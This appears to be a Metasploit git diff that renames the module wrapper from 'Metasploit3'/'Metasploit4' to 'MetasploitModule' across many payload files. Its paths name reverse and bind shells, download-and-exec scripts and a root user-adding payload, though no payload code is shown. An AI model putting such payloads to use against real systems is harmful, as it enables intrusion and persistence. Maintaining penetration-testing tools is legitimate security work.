a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 6de81667fc..40f238704a 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 
diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 2a1ba296ef..cbe48df2fa 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index 229632db3b..2fbd74f012 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/singles/cmd/unix/bind_awk.rb b/modules/payloads/singles/cmd/unix/bind_awk.rb index 9d232ba539..5daf081d65 100644 --- a/modules/payloads/singles/cmd/unix/bind_awk.rb +++ b/modules/payloads/singles/cmd/unix/bind_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 96 diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index bebc37ed4a..ccf344d794 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 487 
diff --git a/modules/payloads/singles/cmd/unix/bind_lua.rb b/modules/payloads/singles/cmd/unix/bind_lua.rb index 63d63f582a..48f3ea4637 100644 --- a/modules/payloads/singles/cmd/unix/bind_lua.rb +++ b/modules/payloads/singles/cmd/unix/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index be87603bc0..f6fede2db6 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb index d22c62128f..ec8804a2ab 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb index aa0255cc18..68e518e90f 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 25 
diff --git a/modules/payloads/singles/cmd/unix/bind_nodejs.rb b/modules/payloads/singles/cmd/unix/bind_nodejs.rb index 22e4a5999f..b795bdd184 100644 --- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1843 diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 003b4a081e..d169b2c3d1 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 240 diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 01d2798d01..d8d3e52457 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index 790e5bf18b..f445299ee3 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 137 
diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index 3dc333efc5..7b012a8e01 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 142 diff --git a/modules/payloads/singles/cmd/unix/bind_zsh.rb b/modules/payloads/singles/cmd/unix/bind_zsh.rb index 9772d7a5a8..49389b7186 100644 --- a/modules/payloads/singles/cmd/unix/bind_zsh.rb +++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 112 diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 3b982b201f..870888f0e4 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index e40b0aad4e..282de3060d 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 2ef164ebd7..006f6a497f 100644 
--- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 130 diff --git a/modules/payloads/singles/cmd/unix/reverse_awk.rb b/modules/payloads/singles/cmd/unix/reverse_awk.rb index 05402d4153..348126cb55 100644 --- a/modules/payloads/singles/cmd/unix/reverse_awk.rb +++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index 381833bdb1..ff8f54d19b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb index 6c10b6194c..f6ad174f4d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_lua.rb b/modules/payloads/singles/cmd/unix/reverse_lua.rb index 95bbd8dd3c..32b84f8b9d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_lua.rb 
+++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 1c63d2d10b..1b45da190d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb index 5040d2cba9..ed12e38ec8 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 35 diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 1d3dd09b0f..bbfba208ca 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1971 diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb index d89af6ad67..09e380f172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb 
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 182 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 0aafd22aba..43b2e09835 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 234 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 8e134bd9de..a948e187b5 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 08a8f93942..b5ec5558ce 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 132 diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index 4e9d7c6b5b..4712d0f048 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb 
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index b1ab1b26f4..d5d07c0499 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 587 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 502efcbb0c..229874d83a 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 133 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb index 009d0f00aa..5e14ec9289 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index bdf31d2045..38f2bcc93f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb 
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb index 9127052406..2f168a313e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb +++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index 3a74d57100..dd34557f1e 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/cmd/windows/bind_lua.rb b/modules/payloads/singles/cmd/windows/bind_lua.rb index d9226dd894..493a4cb4e4 100644 --- a/modules/payloads/singles/cmd/windows/bind_lua.rb +++ b/modules/payloads/singles/cmd/windows/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index 8f540f9a69..0525da8574 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb 
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 139 diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 8bbf6d4845..6b6f946c45 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 140 diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 9271e9df85..dbeaeba1c7 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 5d0e450c91..b9f1e41a93 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index f70437fc6d..0f9ee789a3 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb index 047dc0bfc4..e97a3f57b1 100644 --- a/modules/payloads/singles/cmd/windows/generic.rb +++ b/modules/payloads/singles/cmd/windows/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b33a5a6741..b047521eeb 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 1518 diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 5174312512..18701955de 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/reverse_tcp_ssl' -module Metasploit3 +module MetasploitModule CachedSize = 1526 diff --git a/modules/payloads/singles/cmd/windows/reverse_lua.rb b/modules/payloads/singles/cmd/windows/reverse_lua.rb index fbe52645ad..8fb40e10d1 100644 --- a/modules/payloads/singles/cmd/windows/reverse_lua.rb +++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb 
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index ff007384f0..9b6eefe03a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 148 diff --git a/modules/payloads/singles/cmd/windows/reverse_powershell.rb b/modules/payloads/singles/cmd/windows/reverse_powershell.rb index 510f4b5df5..eb6bd4c53b 100644 --- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb +++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1204 diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index fa61454995..056283fb95 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 126 diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index 9f3dcbc1d5..782ed8627d 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 1019 diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index ce5b678d01..450a54ed7a 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 3b007df865..4f9ad61ee7 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index 8c8a6569fc..943b202789 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 53411e9495..10afe263d7 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 1 diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index 1f321f1d87..08d92ec255 100644 
--- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 20492e6537..f1fe1097fe 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index c689218a3a..3ca11012b8 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 2 diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 517cd5aaf5..fe0c9b1342 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1593 diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index e5201b9a61..a9118aa542 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb 
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1501 diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 5f760639e2..8a8cd0645a 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 7359 diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index d8b72f2391..7bee064a1a 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -14,7 +14,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 119 diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 88c3f9e5b9..30f6a53e8d 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 29 diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index deac8e58a1..3f0721ce5d 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' 